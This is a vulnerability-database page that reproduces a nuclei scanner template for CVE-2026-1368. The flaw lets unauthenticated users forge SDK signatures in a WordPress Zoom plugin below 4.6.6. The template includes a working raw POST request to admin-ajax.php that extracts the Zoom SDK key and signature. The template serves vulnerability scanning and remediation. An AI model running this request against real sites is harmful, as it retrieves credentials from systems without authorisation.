Lucene search
K

Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated attackers can forge Zoom SDK signatures and obtain the SDK key via broken nonce in the WordPress plugin below 4.6.6.

Related
Refs
Code
id: CVE-2026-1368

info:
  name: Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation
  author: 0x_Akoko
  severity: high
  description: |
    Zoom WordPress plugin < 4.6.6 contains a broken authentication caused by disabled nonce verification in an AJAX handler, letting unauthenticated attackers generate valid Zoom SDK signatures and retrieve the Zoom SDK key.
  impact: |
    Unauthenticated attackers can generate valid SDK signatures and retrieve the Zoom SDK key, potentially compromising meeting security.
  remediation: |
    Update to version 4.6.6 or later.
  reference:
    - https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/
    - https://wordpress.org/plugins/video-conferencing-with-zoom-api/
    - https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/
  classification:
    cve-id: CVE-2026-1368
    epss-score: 0.01211
    epss-percentile: 0.64748
    cwe-id: CWE-862
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/video-conferencing-with-zoom-api/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,zoom,vczapi,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/video-conferencing-with-zoom-api/README.txt"

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\d.]+)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Video Conferencing with Zoom")'
          - 'compare_versions(version, "<4.6.6")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get_auth&meeting_id=123456789

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "\"sig\":\"eyJ", "\"type\":\"sdk\"")'
        condition: and

    extractors:
      - type: json
        name: sdk_key
        json:
          - '.data.key'

      - type: json
        name: sdk_signature
        json:
          - '.data.sig'
# digest: 490a0046304402200a6cedf1b9840c20653617b267bd89914111bb7ef8d6954b6e5ba54a41a2310702204f1560cb60c68d9de23a51c7731995e83624d4c37cd3ea4904bae5981f7682e3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Apr 2026 00:56Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.01211
SSVC
10